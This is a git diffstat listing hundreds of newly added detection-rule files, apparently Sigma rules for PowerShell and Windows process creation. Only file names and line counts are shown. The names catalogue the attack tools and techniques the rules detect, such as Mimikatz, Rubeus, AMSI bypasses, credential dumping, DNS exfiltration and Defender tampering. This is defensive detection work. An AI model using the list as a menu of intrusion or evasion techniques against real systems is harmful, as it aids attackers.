+ .../powershell_classic/posh_pc_powercat.yml | 33 + .../posh_pc_remote_powershell_session.yml | 34 + .../posh_pc_remotefxvgpudisablement_abuse.yml | 34 + .../posh_pc_renamed_powershell.yml | 35 + .../posh_pc_susp_download.yml | 33 + .../posh_pc_susp_get_nettcpconnection.yml | 26 + .../posh_pc_susp_zip_compress.yml | 38 + ...posh_pc_tamper_windows_defender_set_mp.yml | 85 + ...sh_pc_wsman_com_provider_no_powershell.yml | 37 + .../posh_pc_xor_commandline.yml | 31 + ..._pm_active_directory_module_dll_import.yml | 40 + .../posh_pm_alternate_powershell_hosts.yml | 54 + .../posh_pm_bad_opsec_artifacts.yml | 43 + .../posh_pm_clear_powershell_history.yml | 47 + .../posh_pm_decompress_commands.yml | 33 + .../posh_pm_exploit_scripts.yml | 275 + .../posh_pm_get_addbaccount.yml | 32 + .../posh_pm_get_clipboard.yml | 30 + .../posh_pm_invoke_obfuscation_clip.yml | 34 + ...h_pm_invoke_obfuscation_obfuscated_iex.yml | 40 + .../posh_pm_invoke_obfuscation_stdin.yml | 34 + .../posh_pm_invoke_obfuscation_var.yml | 34 + ...osh_pm_invoke_obfuscation_via_compress.yml | 40 + .../posh_pm_invoke_obfuscation_via_rundll.yml | 38 + .../posh_pm_invoke_obfuscation_via_stdin.yml | 34 + ...osh_pm_invoke_obfuscation_via_use_clip.yml | 34 + ...sh_pm_invoke_obfuscation_via_use_mhsta.yml | 40 + ...pm_invoke_obfuscation_via_use_rundll32.yml | 43 + .../posh_pm_invoke_obfuscation_via_var.yml | 34 + .../posh_pm_malicious_commandlets.yml | 250 + .../posh_pm_remote_powershell_session.yml | 35 + .../posh_pm_remotefxvgpudisablement_abuse.yml | 37 + .../posh_pm_susp_ad_group_reco.yml | 44 + .../posh_pm_susp_download.yml | 34 + .../posh_pm_susp_get_nettcpconnection.yml | 29 + .../posh_pm_susp_invocation_generic.yml | 45 + .../posh_pm_susp_invocation_specific.yml | 80 + .../posh_pm_susp_local_group_reco.yml | 44 + ..._pm_susp_reset_computermachinepassword.yml | 31 + .../posh_pm_susp_smb_share_reco.yml | 33 + .../posh_pm_susp_zip_compress.yml | 42 + .../posh_pm_syncappvpublishingserver_exe.yml | 34 + 
...posh_ps_aadinternals_cmdlets_execution.yml | 57 + .../posh_ps_access_to_browser_login_data.yml | 45 + ..._ps_active_directory_module_dll_import.yml | 40 + .../posh_ps_add_dnsclient_rule.yml | 35 + .../posh_ps_add_windows_capability.yml | 34 + .../posh_ps_adrecon_execution.yml | 35 + .../posh_ps_amsi_bypass_pattern_nov22.yml | 33 + .../posh_ps_amsi_null_bits_bypass.yml | 34 + .../posh_ps_apt_silence_eda.yml | 52 + .../posh_ps_as_rep_roasting.yml | 35 + .../posh_ps_audio_exfiltration.yml | 42 + .../posh_ps_automated_collection.yml | 43 + .../posh_ps_capture_screenshots.yml | 31 + .../posh_ps_clear_powershell_history.yml | 47 + ...sh_ps_clearing_windows_console_history.yml | 40 + .../posh_ps_cmdlet_scheduled_task.yml | 42 + ...h_ps_computer_discovery_get_adcomputer.yml | 40 + .../posh_ps_copy_item_system_directory.yml | 35 + .../posh_ps_cor_profiler.yml | 36 + .../posh_ps_create_local_user.yml | 31 + .../posh_ps_create_volume_shadow_copy.yml | 32 + .../posh_ps_detect_vm_env.yml | 38 + .../posh_ps_directorysearcher.yml | 33 + ...ps_directoryservices_accountmanagement.yml | 31 + ..._ps_disable_psreadline_command_history.yml | 30 + ...sh_ps_disable_windows_optional_feature.yml | 42 + .../posh_ps_dnscat_execution.yml | 29 + .../posh_ps_dotnet_assembly_from_file.yml | 28 + .../posh_ps_download_com_cradles.yml | 44 + ...mp_password_windows_credential_manager.yml | 44 + .../posh_ps_enable_psremoting.yml | 29 + ...s_enable_susp_windows_optional_feature.yml | 47 + ...te_password_windows_credential_manager.yml | 37 + .../posh_ps_etw_trace_evasion.yml | 38 + ..._exchange_mailbox_smpt_forwarding_rule.yml | 30 + .../posh_ps_export_certificate.yml | 38 + .../posh_ps_frombase64string_archive.yml | 34 + .../posh_ps_get_acl_service.yml | 35 + .../posh_ps_get_adcomputer.yml | 37 + .../powershell_script/posh_ps_get_adgroup.yml | 31 + .../posh_ps_get_adreplaccount.yml | 34 + .../posh_ps_get_childitem_bookmarks.yml | 38 + ...et_process_security_software_discovery.yml | 56 + 
.../powershell_script/posh_ps_hktl_rubeus.yml | 51 + .../powershell_script/posh_ps_hktl_winpwn.yml | 51 + .../powershell_script/posh_ps_hotfix_enum.yml | 29 + .../posh_ps_icmp_exfiltration.yml | 32 + .../posh_ps_import_module_susp_dirs.yml | 47 + ...posh_ps_install_unsigned_appx_packages.yml | 36 + .../posh_ps_invoke_command_remote.yml | 31 + .../posh_ps_invoke_dnsexfiltration.yml | 35 + .../posh_ps_invoke_obfuscation_clip.yml | 31 + ...h_ps_invoke_obfuscation_obfuscated_iex.yml | 36 + .../posh_ps_invoke_obfuscation_stdin.yml | 31 + .../posh_ps_invoke_obfuscation_var.yml | 31 + ...osh_ps_invoke_obfuscation_via_compress.yml | 37 + .../posh_ps_invoke_obfuscation_via_rundll.yml | 35 + .../posh_ps_invoke_obfuscation_via_stdin.yml | 31 + ...osh_ps_invoke_obfuscation_via_use_clip.yml | 31 + ...sh_ps_invoke_obfuscation_via_use_mhsta.yml | 37 + ...ps_invoke_obfuscation_via_use_rundll32.yml | 40 + .../posh_ps_invoke_obfuscation_via_var.yml | 31 + .../powershell_script/posh_ps_keylogging.yml | 34 + .../powershell_script/posh_ps_localuser.yml | 38 + .../posh_ps_mailboxexport_share.yml | 39 + .../posh_ps_malicious_commandlets.yml | 261 + .../posh_ps_malicious_keywords.yml | 49 + ...ps_memorydump_getstoragediagnosticinfo.yml | 30 + .../posh_ps_modify_group_policy_settings.yml | 40 + .../powershell_script/posh_ps_msxml_com.yml | 38 + .../posh_ps_nishang_malicious_commandlets.yml | 112 + .../posh_ps_ntfs_ads_access.yml | 36 + .../posh_ps_office_comobject_registerxll.yml | 34 + .../posh_ps_potential_invoke_mimikatz.yml | 35 + ...osh_ps_powerview_malicious_commandlets.yml | 139 + .../posh_ps_prompt_credentials.yml | 31 + .../posh_ps_psasyncshell.yml | 28 + .../powershell_script/posh_ps_psattack.yml | 29 + .../posh_ps_remote_session_creation.yml | 34 + .../posh_ps_remotefxvgpudisablement_abuse.yml | 36 + .../posh_ps_request_kerberos_ticket.yml | 31 + .../posh_ps_resolve_list_of_ip_from_file.yml | 33 + .../posh_ps_root_certificate_installed.yml | 35 + 
.../posh_ps_run_from_mount_diskimage.yml | 35 + ...osh_ps_script_with_upload_capabilities.yml | 37 + .../posh_ps_send_mailmessage.yml | 34 + .../posh_ps_sensitive_file_discovery.yml | 41 + .../powershell_script/posh_ps_set_acl.yml | 38 + .../posh_ps_set_acl_susp_location.yml | 55 + ...posh_ps_set_policies_to_unsecure_level.yml | 46 + .../posh_ps_shellcode_b64.yml | 36 + ...sh_ps_shellintel_malicious_commandlets.yml | 33 + .../posh_ps_software_discovery.yml | 35 + ...ps_store_file_in_alternate_data_stream.yml | 33 + .../posh_ps_susp_ace_tampering.yml | 39 + .../posh_ps_susp_ad_group_reco.yml | 38 + .../posh_ps_susp_alias_obfscuation.yml | 38 + .../posh_ps_susp_clear_eventlog.yml | 37 + .../posh_ps_susp_directory_enum.yml | 36 + .../posh_ps_susp_download.yml | 34 + .../posh_ps_susp_execute_batch_script.yml | 37 + .../posh_ps_susp_extracting.yml | 36 + .../posh_ps_susp_follina_execution.yml | 33 + ...susp_get_addefaultdomainpasswordpolicy.yml | 29 + .../posh_ps_susp_get_current_user.yml | 32 + .../posh_ps_susp_get_gpo.yml | 29 + .../posh_ps_susp_get_process.yml | 29 + .../posh_ps_susp_getprocess_lsass.yml | 29 + .../posh_ps_susp_gettypefromclsid.yml | 31 + .../posh_ps_susp_hyper_v_condlet.yml | 32 + .../posh_ps_susp_invocation_generic.yml | 45 + .../posh_ps_susp_invocation_specific.yml | 81 + ...sh_ps_susp_invoke_webrequest_useragent.yml | 33 + .../posh_ps_susp_iofilestream.yml | 32 + .../posh_ps_susp_keylogger_activity.yml | 32 + .../posh_ps_susp_keywords.yml | 45 + .../posh_ps_susp_local_group_reco.yml | 38 + .../posh_ps_susp_mail_acces.yml | 35 + .../posh_ps_susp_mount_diskimage.yml | 31 + .../posh_ps_susp_mounted_share_deletion.yml | 31 + .../posh_ps_susp_networkcredential.yml | 33 + .../posh_ps_susp_new_psdrive.yml | 35 + .../posh_ps_susp_proxy_scripts.yml | 31 + .../posh_ps_susp_recon_export.yml | 34 + .../posh_ps_susp_remove_adgroupmember.yml | 33 + ..._service_dacl_modification_set_service.yml | 47 + .../posh_ps_susp_set_alias.yml | 35 + 
.../posh_ps_susp_smb_share_reco.yml | 32 + .../posh_ps_susp_ssl_keyword.yml | 32 + .../posh_ps_susp_start_process.yml | 32 + .../posh_ps_susp_unblock_file.yml | 31 + .../posh_ps_susp_wallpaper.yml | 36 + .../posh_ps_susp_win32_pnpentity.yml | 29 + .../posh_ps_susp_win32_shadowcopy.yml | 32 + ...posh_ps_susp_win32_shadowcopy_deletion.yml | 47 + .../posh_ps_susp_windowstyle.yml | 38 + .../posh_ps_susp_write_eventlog.yml | 29 + .../posh_ps_susp_zip_compress.yml | 42 + .../posh_ps_syncappvpublishingserver_exe.yml | 34 + ...posh_ps_tamper_windows_defender_rem_mp.yml | 37 + ...posh_ps_tamper_windows_defender_set_mp.yml | 92 + .../posh_ps_test_netconnection.yml | 38 + .../powershell_script/posh_ps_timestomp.yml | 38 + .../posh_ps_token_obfuscation.yml | 48 + .../posh_ps_user_discovery_get_aduser.yml | 40 + .../posh_ps_user_profile_tampering.yml | 41 + ..._ps_using_set_service_to_hide_services.yml | 40 + ...osh_ps_veeam_credential_dumping_script.yml | 32 + .../posh_ps_web_request_cmd_and_cmdlets.yml | 45 + .../posh_ps_win32_nteventlogfile_usage.yml | 38 + .../posh_ps_win32_product_install_msi.yml | 33 + .../posh_ps_win_api_susp_access.yml | 54 + .../posh_ps_win_defender_exclusions_added.yml | 42 + ...h_ps_windows_firewall_profile_disabled.yml | 45 + .../posh_ps_winlogon_helper_dll.yml | 37 + .../posh_ps_wmi_persistence.yml | 39 + .../posh_ps_wmi_unquoted_service_search.yml | 42 + .../powershell_script/posh_ps_wmimplant.yml | 51 + .../posh_ps_x509enrollment.yml | 35 + .../powershell_script/posh_ps_xml_iex.yml | 41 + ...proc_creation_win_7zip_exfil_dmp_files.yml | 42 + ...creation_win_7zip_password_compression.yml | 39 + ..._creation_win_7zip_password_extraction.yml | 37 + ...ation_win_addinutil_suspicious_cmdline.yml | 50 + ...n_win_addinutil_uncommon_child_process.yml | 31 + ...reation_win_addinutil_uncommon_cmdline.yml | 37 + ...eation_win_addinutil_uncommon_dir_exec.yml | 31 + .../proc_creation_win_adplus_memory_dump.yml | 42 + 
...tion_win_agentexecutor_potential_abuse.yml | 44 + ..._creation_win_agentexecutor_susp_usage.yml | 48 + ...tion_win_appvlp_uncommon_child_process.yml | 46 + ...creation_win_aspnet_compiler_exectuion.yml | 37 + ...win_aspnet_compiler_susp_child_process.yml | 46 + ...reation_win_aspnet_compiler_susp_paths.yml | 45 + ..._creation_win_at_interactive_execution.yml | 28 + .../proc_creation_win_attrib_hiding_files.yml | 37 + .../proc_creation_win_attrib_system.yml | 34 + ..._creation_win_attrib_system_susp_paths.yml | 56 + ...ion_win_auditpol_nt_resource_kit_usage.yml | 38 + ...c_creation_win_auditpol_susp_execution.yml | 38 + ...oc_creation_win_bash_command_execution.yml | 31 + .../proc_creation_win_bash_file_execution.yml | 46 + ..._creation_win_bcdedit_boot_conf_tamper.yml | 41 + ...oc_creation_win_bcdedit_susp_execution.yml | 35 + ...on_win_bginfo_suspicious_child_process.yml | 51 + ...tion_win_bginfo_uncommon_child_process.yml | 35 + .../proc_creation_win_bitsadmin_download.yml | 43 + ...ation_win_bitsadmin_download_direct_ip.yml | 57 + ...itsadmin_download_file_sharing_domains.yml | 68 + ...win_bitsadmin_download_susp_extensions.yml | 71 + ...n_bitsadmin_download_susp_targetfolder.yml | 50 + ...tsadmin_download_uncommon_targetfolder.yml | 48 + ...on_win_bitsadmin_potential_persistence.yml | 43 + ...n_browsers_chromium_headless_debugging.yml | 34 + ...on_win_browsers_chromium_headless_exec.yml | 35 + ...owsers_chromium_headless_file_download.yml | 39 + ...n_win_browsers_chromium_load_extension.yml | 37 + ...on_win_browsers_chromium_mockbin_abuse.yml | 35 + ..._browsers_chromium_susp_load_extension.yml | 46 + ...tion_win_browsers_inline_file_download.yml | 47 + ...creation_win_browsers_remote_debugging.yml | 36 + ...oc_creation_win_browsers_tor_execution.yml | 28 + .../proc_creation_win_calc_uncommon_exec.yml | 34 + ...n_win_certmgr_certificate_installation.yml | 39 + .../proc_creation_win_certoc_download.yml | 34 + ...creation_win_certoc_download_direct_ip.yml | 34 
+ .../proc_creation_win_certoc_load_dll.yml | 39 + ...ion_win_certoc_load_dll_susp_locations.yml | 43 + ..._win_certutil_certificate_installation.yml | 40 + .../proc_creation_win_certutil_decode.yml | 39 + .../proc_creation_win_certutil_download.yml | 39 + ...eation_win_certutil_download_direct_ip.yml | 76 + ...certutil_download_file_sharing_domains.yml | 66 + .../proc_creation_win_certutil_encode.yml | 33 + ...on_win_certutil_encode_susp_extensions.yml | 51 + ...tion_win_certutil_encode_susp_location.yml | 46 + .../proc_creation_win_certutil_export_pfx.yml | 31 + ...oc_creation_win_certutil_ntlm_coercion.yml | 31 + ...proc_creation_win_chcp_codepage_switch.yml | 36 + ...tion_win_cipher_overwrite_deleted_data.yml | 32 + ...ion_win_citrix_trolleyexpress_procdump.yml | 47 + .../proc_creation_win_clip_execution.yml | 28 + ...ion_win_cloudflared_portable_execution.yml | 34 + ..._win_cloudflared_quicktunnel_execution.yml | 92 + ...reation_win_cloudflared_tunnel_cleanup.yml | 34 + ...oc_creation_win_cloudflared_tunnel_run.yml | 37 + .../proc_creation_win_cmd_assoc_execution.yml | 42 + ..._cmd_assoc_tamper_exe_file_association.yml | 38 + ...c_creation_win_cmd_copy_dmp_from_share.yml | 35 + ...ation_win_cmd_curl_download_exec_combo.yml | 36 + .../proc_creation_win_cmd_del_execution.yml | 41 + ...c_creation_win_cmd_del_greedy_deletion.yml | 40 + .../proc_creation_win_cmd_dir_execution.yml | 29 + .../proc_creation_win_cmd_dosfuscation.yml | 45 + .../proc_creation_win_cmd_http_appdata.yml | 37 + .../proc_creation_win_cmd_mklink_osk_cmd.yml | 34 + ...md_mklink_shadow_copies_access_symlink.yml | 29 + ...reation_win_cmd_net_use_and_exec_combo.yml | 40 + ...oc_creation_win_cmd_no_space_execution.yml | 70 + ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 29 + .../proc_creation_win_cmd_path_traversal.yml | 43 + ...n_win_cmd_ping_copy_combined_execution.yml | 35 + ...on_win_cmd_ping_del_combined_execution.yml | 45 + .../proc_creation_win_cmd_redirect.yml | 37 + 
...eation_win_cmd_redirection_susp_folder.yml | 60 + .../proc_creation_win_cmd_rmdir_execution.yml | 38 + ...roc_creation_win_cmd_shadowcopy_access.yml | 32 + .../proc_creation_win_cmd_stdin_redirect.yml | 32 + ...cmd_sticky_key_like_backdoor_execution.yml | 49 + ...c_creation_win_cmd_sticky_keys_replace.yml | 33 + .../proc_creation_win_cmd_unusual_parent.yml | 51 + ...eation_win_cmdkey_adding_generic_creds.yml | 31 + .../proc_creation_win_cmdkey_recon.yml | 37 + ...eation_win_cmstp_execution_by_creation.yml | 34 + ...roc_creation_win_conhost_legacy_option.yml | 31 + ...reation_win_conhost_susp_child_process.yml | 34 + ...c_creation_win_conhost_uncommon_parent.yml | 58 + .../proc_creation_win_control_panel_item.yml | 46 + ...eation_win_createdump_lolbin_execution.yml | 39 + ...ation_win_csc_susp_dynamic_compilation.yml | 75 + .../proc_creation_win_csc_susp_parent.yml | 90 + .../proc_creation_win_csi_execution.yml | 43 + .../proc_creation_win_csvde_export.yml | 31 + ...roc_creation_win_curl_cookie_hijacking.yml | 28 + ...oc_creation_win_curl_custom_user_agent.yml | 29 + ...ation_win_curl_download_direct_ip_exec.yml | 84 + ...url_download_direct_ip_susp_extensions.yml | 81 + ...url_download_susp_file_sharing_domains.yml | 92 + ..._creation_win_curl_insecure_connection.yml | 28 + ...reation_win_curl_insecure_porxy_or_doh.yml | 29 + ...proc_creation_win_curl_local_file_read.yml | 27 + .../proc_creation_win_curl_susp_download.yml | 70 + ...desktopimgdownldr_remote_file_download.yml | 27 + ...n_win_desktopimgdownldr_susp_execution.yml | 39 + ...ion_win_deviceenroller_dll_sideloading.yml | 35 + ...proc_creation_win_devinit_lolbin_usage.yml | 30 + ...n_win_dfsvc_suspicious_child_processes.yml | 44 + .../proc_creation_win_dirlister_execution.yml | 28 + ...tion_win_diskshadow_child_process_susp.yml | 50 + ...on_win_diskshadow_script_mode_susp_ext.yml | 51 + ...n_diskshadow_script_mode_susp_location.yml | 54 + ..._creation_win_dll_sideload_vmware_xfer.yml | 27 + 
..._creation_win_dllhost_no_cli_execution.yml | 33 + ...n_win_dns_exfiltration_tools_execution.yml | 28 + ...oc_creation_win_dns_susp_child_process.yml | 28 + .../proc_creation_win_dnscmd_discovery.yml | 35 + ...md_install_new_server_level_plugin_dll.yml | 36 + ...tion_win_dotnet_trace_lolbin_execution.yml | 31 + .../proc_creation_win_driverquery_recon.yml | 42 + .../proc_creation_win_driverquery_usage.yml | 42 + ..._creation_win_dsacls_abuse_permissions.yml | 38 + ...roc_creation_win_dsacls_password_spray.yml | 33 + .../proc_creation_win_dsim_remove.yml | 43 + ...ion_win_dsquery_domain_trust_discovery.yml | 35 + .../proc_creation_win_dtrace_kernel_dump.yml | 31 + ...oc_creation_win_dumpminitool_execution.yml | 42 + ...eation_win_dumpminitool_susp_execution.yml | 49 + .../proc_creation_win_esentutl_params.yml | 36 + ...ation_win_esentutl_sensitive_file_copy.yml | 49 + .../proc_creation_win_esentutl_webcache.yml | 35 + ...eation_win_eventvwr_susp_child_process.yml | 37 + ...ltration_and_tunneling_tools_execution.yml | 31 + ...proc_creation_win_expand_cabinet_files.yml | 53 + ...eation_win_explorer_break_process_tree.yml | 37 + ...creation_win_explorer_lolbin_execution.yml | 28 + .../proc_creation_win_explorer_nouaccheck.yml | 31 + .../proc_creation_win_findstr_download.yml | 47 + ...roc_creation_win_findstr_gpp_passwords.yml | 36 + .../proc_creation_win_findstr_lnk.yml | 38 + .../proc_creation_win_findstr_lsass.yml | 41 + ...oc_creation_win_findstr_recon_everyone.yml | 46 + ...creation_win_findstr_recon_pipe_output.yml | 73 + ...on_win_findstr_security_keyword_lookup.yml | 67 + ..._creation_win_findstr_subfolder_search.yml | 45 + ..._sysmon_discovery_via_default_altitude.yml | 33 + .../proc_creation_win_finger_usage.yml | 29 + .../proc_creation_win_fltmc_unload_driver.yml | 38 + ...reation_win_fltmc_unload_driver_sysmon.yml | 36 + ...in_forfiles_child_process_masquerading.yml | 43 + ...creation_win_forfiles_proxy_execution_.yml | 40 + 
..._creation_win_fsutil_drive_enumeration.yml | 30 + ..._creation_win_fsutil_symlinkevaluation.yml | 35 + .../proc_creation_win_fsutil_usage.yml | 41 + ...ownloadwrapper_arbitrary_file_download.yml | 31 + .../proc_creation_win_git_susp_clone.yml | 50 + ...on_win_googleupdate_susp_child_process.yml | 37 + .../proc_creation_win_gpg4win_decryption.yml | 33 + .../proc_creation_win_gpg4win_encryption.yml | 33 + ...reation_win_gpg4win_portable_execution.yml | 36 + ...roc_creation_win_gpg4win_susp_location.yml | 40 + .../proc_creation_win_gpresult_execution.yml | 31 + ...ion_win_gup_arbitrary_binary_execution.yml | 33 + .../proc_creation_win_gup_download.yml | 33 + ..._creation_win_gup_suspicious_execution.yml | 35 + .../proc_creation_win_hh_chm_execution.yml | 31 + ...in_hh_chm_remote_download_or_execution.yml | 31 + ...on_win_hh_html_help_susp_child_process.yml | 57 + .../proc_creation_win_hh_susp_execution.yml | 55 + .../proc_creation_win_hktl_adcspwn.yml | 28 + ...reation_win_hktl_bloodhound_sharphound.yml | 57 + ..._creation_win_hktl_c3_rundll32_pattern.yml | 29 + .../proc_creation_win_hktl_certify.yml | 44 + .../proc_creation_win_hktl_certipy.yml | 50 + ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 48 + ...win_hktl_cobaltstrike_bloopers_modules.yml | 41 + ...win_hktl_cobaltstrike_load_by_rundll32.yml | 37 + ...win_hktl_cobaltstrike_process_patterns.yml | 43 + .../proc_creation_win_hktl_coercedpotato.yml | 38 + .../proc_creation_win_hktl_covenant.yml | 39 + ...eation_win_hktl_crackmapexec_execution.yml | 85 + ...n_hktl_crackmapexec_execution_patterns.yml | 40 + ...reation_win_hktl_crackmapexec_patterns.yml | 48 + ...tl_crackmapexec_powershell_obfuscation.yml | 47 + .../proc_creation_win_hktl_createminidump.yml | 28 + .../proc_creation_win_hktl_dinjector.yml | 28 + .../proc_creation_win_hktl_edrsilencer.yml | 28 + ...tion_win_hktl_empire_powershell_launch.yml | 35 + ..._win_hktl_empire_powershell_uac_bypass.yml | 34 + .../proc_creation_win_hktl_evil_winrm.yml | 31 + 
...ation_win_hktl_execution_via_imphashes.yml | 202 + .../proc_creation_win_hktl_gmer.yml | 34 + .../proc_creation_win_hktl_handlekatz.yml | 43 + .../proc_creation_win_hktl_hashcat.yml | 32 + ...c_creation_win_hktl_htran_or_natbypass.yml | 34 + .../proc_creation_win_hktl_hydra.yml | 32 + ...ion_win_hktl_impacket_lateral_movement.yml | 75 + .../proc_creation_win_hktl_impacket_tools.yml | 77 + .../proc_creation_win_hktl_impersonate.yml | 43 + .../proc_creation_win_hktl_inveigh.yml | 37 + ...ation_win_hktl_invoke_obfuscation_clip.yml | 38 + ...obfuscation_obfuscated_iex_commandline.yml | 34 + ...tion_win_hktl_invoke_obfuscation_stdin.yml | 41 + ...eation_win_hktl_invoke_obfuscation_var.yml | 37 + ...n_hktl_invoke_obfuscation_via_compress.yml | 34 + ..._win_hktl_invoke_obfuscation_via_stdin.yml | 35 + ...n_hktl_invoke_obfuscation_via_use_clip.yml | 43 + ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 34 + ...on_win_hktl_invoke_obfuscation_via_var.yml | 42 + ...eation_win_hktl_jlaive_batch_execution.yml | 44 + .../proc_creation_win_hktl_koadic.yml | 39 + .../proc_creation_win_hktl_krbrelay.yml | 42 + .../proc_creation_win_hktl_krbrelayup.yml | 44 + .../proc_creation_win_hktl_localpotato.yml | 39 + ...reation_win_hktl_meterpreter_getsystem.yml | 53 + ...reation_win_hktl_mimikatz_command_line.yml | 58 + .../proc_creation_win_hktl_pchunter.yml | 61 + ...tl_powersploit_empire_default_schtasks.yml | 46 + .../proc_creation_win_hktl_powertool.yml | 32 + ...eation_win_hktl_purplesharp_indicators.yml | 31 + .../proc_creation_win_hktl_pypykatz.yml | 32 + .../proc_creation_win_hktl_quarks_pwdump.yml | 37 + ...on_win_hktl_redmimicry_winnti_playbook.yml | 35 + ..._creation_win_hktl_relay_attacks_tools.yml | 61 + .../proc_creation_win_hktl_rubeus.yml | 52 + .../proc_creation_win_hktl_safetykatz.yml | 28 + .../proc_creation_win_hktl_secutyxploded.yml | 29 + .../proc_creation_win_hktl_selectmyparent.yml | 57 + .../proc_creation_win_hktl_sharp_chisel.yml | 32 + 
..._creation_win_hktl_sharp_impersonation.yml | 43 + ...c_creation_win_hktl_sharp_ldap_monitor.yml | 31 + .../proc_creation_win_hktl_sharpersist.yml | 44 + .../proc_creation_win_hktl_sharpevtmute.yml | 33 + ...proc_creation_win_hktl_sharpldapwhoami.yml | 38 + .../proc_creation_win_hktl_sharpup.yml | 37 + .../proc_creation_win_hktl_sharpview.yml | 145 + ...n_win_hktl_sliver_c2_execution_pattern.yml | 27 + ...ation_win_hktl_stracciatella_execution.yml | 36 + .../proc_creation_win_hktl_sysmoneop.yml | 34 + .../proc_creation_win_hktl_trufflesnout.yml | 29 + .../proc_creation_win_hktl_uacme.yml | 69 + .../proc_creation_win_hktl_wce.yml | 37 + .../proc_creation_win_hktl_winpeas.yml | 51 + .../proc_creation_win_hktl_winpwn.yml | 48 + ...on_win_hktl_wmiexec_default_powershell.yml | 25 + .../proc_creation_win_hktl_xordump.yml | 32 + .../proc_creation_win_hktl_zipexec.yml | 38 + .../proc_creation_win_hostname_execution.yml | 26 + .../proc_creation_win_hwp_exploits.yml | 35 + .../proc_creation_win_icacls_deny.yml | 31 + .../proc_creation_win_ieexec_download.yml | 31 + ...c_creation_win_iis_appcmd_http_logging.yml | 33 + ...appcmd_service_account_password_dumped.yml | 51 + ...ion_win_iis_appcmd_susp_module_install.yml | 37 + ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 32 + ..._win_iis_connection_strings_decryption.yml | 31 + ...ation_win_iis_susp_module_registration.yml | 35 + ...ion_win_imagingdevices_unusual_parents.yml | 34 + .../proc_creation_win_imewbdld_download.yml | 36 + ..._infdefaultinstall_execute_sct_scripts.yml | 34 + ...proc_creation_win_installutil_download.yml | 33 + ...eation_win_instalutil_no_log_execution.yml | 30 + ...on_win_java_keytool_susp_child_process.yml | 53 + ...n_java_manageengine_susp_child_process.yml | 64 + ...roc_creation_win_java_remote_debugging.yml | 37 + ...c_creation_win_java_susp_child_process.yml | 54 + ...creation_win_java_susp_child_process_2.yml | 36 + .../proc_creation_win_kd_execution.yml | 26 + 
...on_win_ksetup_password_change_computer.yml | 28 + ...eation_win_ksetup_password_change_user.yml | 27 + .../proc_creation_win_ldifde_export.yml | 31 + .../proc_creation_win_ldifde_file_load.yml | 36 + ...n_lodctr_performance_counter_tampering.yml | 29 + ...c_creation_win_logman_disable_eventlog.yml | 40 + .../proc_creation_win_lolbin_cdb.yml | 36 + ...creation_win_lolbin_class_exec_xwizard.yml | 27 + .../proc_creation_win_lolbin_cmdl32.yml | 34 + ...eation_win_lolbin_configsecuritypolicy.yml | 33 + ...oc_creation_win_lolbin_customshellhost.yml | 28 + ...data_exfiltration_by_using_datasvcutil.yml | 43 + ...eation_win_lolbin_dctask64_proc_inject.yml | 34 + .../proc_creation_win_lolbin_defaultpack.yml | 27 + ...in_lolbin_device_credential_deployment.yml | 25 + ...c_creation_win_lolbin_devtoolslauncher.yml | 28 + .../proc_creation_win_lolbin_diantz_ads.yml | 29 + ..._creation_win_lolbin_diantz_remote_cab.yml | 29 + ...eation_win_lolbin_dll_sideload_xwizard.yml | 29 + .../proc_creation_win_lolbin_dnx.yml | 28 + .../proc_creation_win_lolbin_dotnet.yml | 38 + .../proc_creation_win_lolbin_dotnet_dump.yml | 29 + .../proc_creation_win_lolbin_dump64.yml | 32 + .../proc_creation_win_lolbin_extexport.yml | 28 + .../proc_creation_win_lolbin_extrac32.yml | 35 + .../proc_creation_win_lolbin_extrac32_ads.yml | 29 + .../proc_creation_win_lolbin_format.yml | 33 + ...reation_win_lolbin_fsharp_interpreters.yml | 31 + .../proc_creation_win_lolbin_ftp.yml | 35 + ...reation_win_lolbin_gather_network_info.yml | 41 + .../proc_creation_win_lolbin_gpscript.yml | 34 + .../proc_creation_win_lolbin_ie4uinit.yml | 34 + .../proc_creation_win_lolbin_ilasm.yml | 28 + .../proc_creation_win_lolbin_jsc.yml | 26 + .../proc_creation_win_lolbin_kavremover.yml | 29 + ..._creation_win_lolbin_launch_vsdevshell.yml | 29 + .../proc_creation_win_lolbin_manage_bde.yml | 40 + ...win_lolbin_mavinject_process_injection.yml | 40 + .../proc_creation_win_lolbin_mpiexec.yml | 34 + 
.../proc_creation_win_lolbin_msdeploy.yml | 37 + ...c_creation_win_lolbin_msdt_answer_file.yml | 33 + .../proc_creation_win_lolbin_openconsole.yml | 28 + .../proc_creation_win_lolbin_openwith.yml | 28 + .../proc_creation_win_lolbin_pcalua.yml | 31 + .../proc_creation_win_lolbin_pcwrun.yml | 34 + ...roc_creation_win_lolbin_pcwrun_follina.yml | 27 + .../proc_creation_win_lolbin_pcwutl.yml | 32 + .../proc_creation_win_lolbin_pester.yml | 38 + .../proc_creation_win_lolbin_pester_1.yml | 43 + .../proc_creation_win_lolbin_printbrm.yml | 30 + .../proc_creation_win_lolbin_pubprn.yml | 27 + ...tion_win_lolbin_rasautou_dll_execution.yml | 33 + .../proc_creation_win_lolbin_register_app.yml | 27 + .../proc_creation_win_lolbin_remote.yml | 27 + .../proc_creation_win_lolbin_replace.yml | 31 + .../proc_creation_win_lolbin_runexehelper.yml | 26 + ...oc_creation_win_lolbin_runscripthelper.yml | 31 + .../proc_creation_win_lolbin_scriptrunner.yml | 29 + .../proc_creation_win_lolbin_setres.yml | 30 + .../proc_creation_win_lolbin_sftp.yml | 32 + ...eation_win_lolbin_sideload_link_binary.yml | 32 + .../proc_creation_win_lolbin_sigverif.yml | 26 + .../proc_creation_win_lolbin_ssh.yml | 38 + ...eation_win_lolbin_susp_acccheckconsole.yml | 31 + ...proc_creation_win_lolbin_susp_atbroker.yml | 57 + ...ation_win_lolbin_susp_certreq_download.yml | 36 + ...olbin_susp_driver_installed_by_pnputil.yml | 40 + .../proc_creation_win_lolbin_susp_dxcap.yml | 30 + .../proc_creation_win_lolbin_susp_grpconv.yml | 27 + ...ion_win_lolbin_susp_sqldumper_activity.yml | 31 + ...n_syncappvpublishingserver_execute_psh.yml | 38 + ...ncappvpublishingserver_vbs_execute_psh.yml | 35 + .../proc_creation_win_lolbin_tracker.yml | 41 + .../proc_creation_win_lolbin_ttdinject.yml | 26 + ..._creation_win_lolbin_tttracer_mod_load.yml | 33 + .../proc_creation_win_lolbin_type.yml | 32 + .../proc_creation_win_lolbin_unregmp2.yml | 28 + ...c_creation_win_lolbin_utilityfunctions.yml | 27 + 
